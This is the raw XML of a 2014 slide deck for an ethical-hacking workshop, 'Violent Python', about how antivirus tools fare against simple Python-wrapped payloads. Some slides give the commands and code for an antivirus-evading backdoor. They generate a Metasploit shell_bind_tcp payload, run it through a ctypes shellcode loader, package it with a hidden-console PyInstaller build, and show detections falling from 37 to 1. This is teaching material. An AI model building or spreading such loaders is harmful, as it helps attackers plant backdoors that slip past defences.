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jpeg" ContentType="image/jpeg"/>
  <Default Extension="mp4" ContentType="video/unknown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78"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="353" r:id="rId4"/>
    <p:sldId id="348" r:id="rId5"/>
    <p:sldId id="349" r:id="rId6"/>
    <p:sldId id="350" r:id="rId7"/>
    <p:sldId id="351" r:id="rId8"/>
    <p:sldId id="355" r:id="rId9"/>
    <p:sldId id="356" r:id="rId10"/>
    <p:sldId id="354" r:id="rId11"/>
    <p:sldId id="357" r:id="rId12"/>
    <p:sldId id="358" r:id="rId13"/>
    <p:sldId id="359" r:id="rId14"/>
    <p:sldId id="360" r:id="rId15"/>
    <p:sldId id="361" r:id="rId16"/>
    <p:sldId id="362" r:id="rId17"/>
    <p:sldId id="363" r:id="rId18"/>
    <p:sldId id="364" r:id="rId19"/>
    <p:sldId id="365" r:id="rId20"/>
    <p:sldId id="258" r:id="rId21"/>
    <p:sldId id="261" r:id="rId22"/>
    <p:sldId id="259" r:id="rId23"/>
    <p:sldId id="263" r:id="rId24"/>
    <p:sldId id="264" r:id="rId25"/>
    <p:sldId id="266" r:id="rId26"/>
    <p:sldId id="265" r:id="rId27"/>
    <p:sldId id="268" r:id="rId28"/>
    <p:sldId id="269" r:id="rId29"/>
    <p:sldId id="270" r:id="rId30"/>
    <p:sldId id="274" r:id="rId31"/>
    <p:sldId id="260" r:id="rId32"/>
    <p:sldId id="279" r:id="rId33"/>
    <p:sldId id="262" r:id="rId34"/>
    <p:sldId id="271" r:id="rId35"/>
    <p:sldId id="272" r:id="rId36"/>
    <p:sldId id="275" r:id="rId37"/>
    <p:sldId id="276" r:id="rId38"/>
    <p:sldId id="273" r:id="rId39"/>
    <p:sldId id="280" r:id="rId40"/>
    <p:sldId id="278" r:id="rId41"/>
    <p:sldId id="277" r:id="rId42"/>
    <p:sldId id="288" r:id="rId43"/>
    <p:sldId id="281" r:id="rId44"/>
    <p:sldId id="283" r:id="rId45"/>
    <p:sldId id="285" r:id="rId46"/>
    <p:sldId id="284" r:id="rId47"/>
    <p:sldId id="286" r:id="rId48"/>
    <p:sldId id="289" r:id="rId49"/>
    <p:sldId id="292" r:id="rId50"/>
    <p:sldId id="299" r:id="rId51"/>
    <p:sldId id="295" r:id="rId52"/>
    <p:sldId id="302" r:id="rId53"/>
    <p:sldId id="303" r:id="rId54"/>
    <p:sldId id="300" r:id="rId55"/>
    <p:sldId id="290" r:id="rId56"/>
    <p:sldId id="291" r:id="rId57"/>
    <p:sldId id="293" r:id="rId58"/>
    <p:sldId id="294" r:id="rId59"/>
    <p:sldId id="296" r:id="rId60"/>
    <p:sldId id="297" r:id="rId61"/>
    <p:sldId id="298" r:id="rId62"/>
    <p:sldId id="304" r:id="rId63"/>
    <p:sldId id="305" r:id="rId64"/>
    <p:sldId id="306" r:id="rId65"/>
    <p:sldId id="337" r:id="rId66"/>
    <p:sldId id="307" r:id="rId67"/>
    <p:sldId id="308" r:id="rId68"/>
    <p:sldId id="309" r:id="rId69"/>
    <p:sldId id="310" r:id="rId70"/>
    <p:sldId id="311" r:id="rId71"/>
    <p:sldId id="312" r:id="rId72"/>
    <p:sldId id="313" r:id="rId73"/>
    <p:sldId id="314" r:id="rId74"/>
    <p:sldId id="346" r:id="rId75"/>
    <p:sldId id="347" r:id="rId76"/>
    <p:sldId id="341" r:id="rId7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81" d="100"/>
          <a:sy n="81" d="100"/>
        </p:scale>
        <p:origin x="-704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890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80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="printerSettings/printerSettings1.bin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390557-D63B-1640-95DF-DE44DC0E7002}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/24/14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67C26-A583-A940-8C70-3004F490550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57300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C6C34-BADF-6B48-8B4F-275547A6E615}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/24/14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4AF429-3049-8E49-8E1A-3EF3D6C5F84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87600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C6C34-BADF-6B48-8B4F-275547A6E615}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/24/14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4AF429-3049-8E49-8E1A-3EF3D6C5F84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82239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C6C34-BADF-6B48-8B4F-275547A6E615}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/24/14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4AF429-3049-8E49-8E1A-3EF3D6C5F84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75324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C6C34-BADF-6B48-8B4F-275547A6E615}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/24/14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4AF429-3049-8E49-8E1A-3EF3D6C5F84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68429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C6C34-BADF-6B48-8B4F-275547A6E615}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/24/14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4AF429-3049-8E49-8E1A-3EF3D6C5F84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06592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C6C34-BADF-6B48-8B4F-275547A6E615}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/24/14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4AF429-3049-8E49-8E1A-3EF3D6C5F84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3424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C6C34-BADF-6B48-8B4F-275547A6E615}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/24/14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4AF429-3049-8E49-8E1A-3EF3D6C5F84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56756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C6C34-BADF-6B48-8B4F-275547A6E615}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/24/14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4AF429-3049-8E49-8E1A-3EF3D6C5F84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98894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C6C34-BADF-6B48-8B4F-275547A6E615}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/24/14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4AF429-3049-8E49-8E1A-3EF3D6C5F84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50327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C6C34-BADF-6B48-8B4F-275547A6E615}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/24/14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4AF429-3049-8E49-8E1A-3EF3D6C5F84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90371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C6C34-BADF-6B48-8B4F-275547A6E615}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/24/14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4AF429-3049-8E49-8E1A-3EF3D6C5F84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62522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3C6C34-BADF-6B48-8B4F-275547A6E615}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/24/14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4AF429-3049-8E49-8E1A-3EF3D6C5F84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84281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7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4.jp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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35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7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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44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n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5779" y="149411"/>
            <a:ext cx="8748888" cy="5150397"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>Violent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Innovations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>in Cybersecurity Education Workshop </a:t>
            </a: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2800" dirty="0" smtClean="0"/>
              <a:t>June 24, 2014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2725330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lunch-smor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043143"/>
            <a:ext cx="8255000" cy="177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7122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CNIT 124</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Advanced Ethical Hacking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68927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Two Textbooks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="he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140" y="1581791"/>
            <a:ext cx="3119856" cy="3883638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="violent-pytho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7274" y="1581791"/>
            <a:ext cx="3129173" cy="388363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74140" y="5738847"/>
            <a:ext cx="311985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Required</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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5046591" y="5718768"/>
            <a:ext cx="311985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Optional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8620517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Violent Python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Good coding principles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exception handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Modular design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Optimization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Commenting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flow charts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FORGET THEM ALL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16668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Violent Python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We are hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We are here to BREAK STUFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It should be fast and easy for a complete novice to hack together a simple script to do something fun!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85022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creen Shot 2014-06-22 at 2.01.2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6326"/>
            <a:ext cx="8313084" cy="2764561"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-06-22 at 2.02.30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1926" y="3355500"/>
            <a:ext cx="5441643" cy="1646391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="p3-ps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669" y="5188482"/>
            <a:ext cx="64389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0782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Screen Shot 2014-06-22 at 2.07.5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25" y="422933"/>
            <a:ext cx="8115300" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="p3-ps1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44610"/>
            <a:ext cx="9144000" cy="1605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0926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Screen Shot 2014-06-22 at 2.08.4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417638"/>
            <a:ext cx="8407400" cy="383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7149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Projects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creen Shot 2014-06-22 at 2.10.0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00" y="2038411"/>
            <a:ext cx="8521700" cy="3941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1927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creen Shot 2014-06-22 at 2.10.1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23924"/>
            <a:ext cx="9144000" cy="2643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8956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Screen Shot 2014-05-22 at 9.11.58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3571" y="2004786"/>
            <a:ext cx="6350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8281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85800" y="1378857"/>
            <a:ext cx="7772400" cy="3193143"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" smtClean="0"/>
              <a:t>Antivirus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Ungh!  Good God y'all...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sz="6700" dirty="0" smtClean="0"/>
              <a:t>What is it GOOD For?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="458950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Screen Shot 2014-05-22 at 9.18.05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229" y="1032002"/>
            <a:ext cx="7946571" cy="2533445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4F81BD"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-05-22 at 9.17.15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657" y="3970191"/>
            <a:ext cx="8146143" cy="1785147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4F81BD"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24394922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Mikko Hypponen Video</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="F-secure's Mikko Hyppönen_ Full talk from Wired 2012_2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4825" y="1600200"/>
            <a:ext cx="8135938" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10122007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Metasploit Payloads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10736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Metasploit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Hundreds of payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The simplest one: bind_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Listens on a TCP port for commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2014-05-22 at 11.21.32 A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087"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="491702" y="3733375"/>
            <a:ext cx="8195098" cy="214355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31333" y="4615555"/>
            <a:ext cx="4289778" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800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31758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Simple Reverse Shell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One command to produce very simple Windows EXE malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="p8-av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420985"/>
            <a:ext cx="8490857" cy="214578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568221" y="3405946"/>
            <a:ext cx="6290029" cy="308804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36077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Antivirus Catches It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p8-av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484" y="2030583"/>
            <a:ext cx="7115904" cy="3834918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4F81BD"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36151242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Norton v. Shell.exe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Screen Shot 2014-05-22 at 10.18.10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328" y="1600200"/>
            <a:ext cx="6679693" cy="4844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8149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Norton Identifies the Metasploit Packer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Screen Shot 2014-05-22 at 10.19.56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895784"/>
            <a:ext cx="8066956" cy="3675669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4F81BD"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21635073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VirusTotal: 37/49 Detections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p8-av9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53"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="718085" y="1417638"/>
            <a:ext cx="7968715" cy="5225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3307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Pedagogy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401677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508000" y="1955801"/>
            <a:ext cx="2768600" cy="2457450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How to Become 007</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="rogermooreliveandletdi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0000" y="369543"/>
            <a:ext cx="4950000" cy="6132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1315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Screen Shot 2014-05-22 at 9.27.40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0554" y="402770"/>
            <a:ext cx="5050303" cy="622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9527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85800" y="1058333"/>
            <a:ext cx="7772400" cy="3795889"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>Python v. AV</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Round 1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>shell_bind_tcp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38444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Export Metasploit Payloads to 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 descr="Screen Shot 2014-05-22 at 11.30.17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011153"/>
            <a:ext cx="8366796" cy="2880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7444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Use Ctypes Python Library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Screen Shot 2014-05-22 at 11.31.00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046986"/>
            <a:ext cx="8229600" cy="1599787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-05-22 at 11.32.08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985049"/>
            <a:ext cx="8229600" cy="1124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7857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Compile it on Windows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Install these  things, in order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Python 2.7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PyWin32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pip-Win</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PyInstaller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This creates an EXE file that listens on a TCP port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2014-05-22 at 11.35.25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29452"/>
            <a:ext cx="9144000" cy="993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6128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39800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DEMO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7000" y="1193800"/>
            <a:ext cx="8890000" cy="5664200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>msfpayload windows/shell_bind_tcp C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&gt; foo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>nano foo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change top to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>from ctypes import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shellcode = (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bottom to</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>memorywithshell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>= create_string_buffer(shellcode, len(shellcode))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shell = cast(memorywithshell, CFUNCTYPE(c_void_p)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>shell()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11439617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39800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DEMO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93800"/>
            <a:ext cx="8229600" cy="5664200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On Windows, in pip-Win:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>venv -c -i pyi-env-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>pyinstaller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>--onefile --noconsole foo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10198080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VirusTotal: 1/50 Detection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p8-av27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41" b="7039"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="777203" y="1417638"/>
            <a:ext cx="7741241" cy="5195114"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="4F81BD"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27087700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Norton Support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 Tweeted about this, and @NortonSupport replied</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VirusTotal is not a fair test, because real installed Norton uses Heuristic Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>@NortonSupport gave me a link for a 30-day trial version :)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20535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Diversity in Education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Students have different previous experience, knowledge and goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They aren't all going to learn the same things in the same class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>My goal is NOT to make them all achieve the same proficiency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>My goal is to provide every student with material they can grasp and interesting challenges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076093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Norton Wins!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Screen Shot 2014-05-23 at 5.01.04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444" y="1600200"/>
            <a:ext cx="6740774" cy="4721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6836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Kaspersky Wins!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Avast! doesn't detect it</a:t>
            </a:r>
          </a:p>
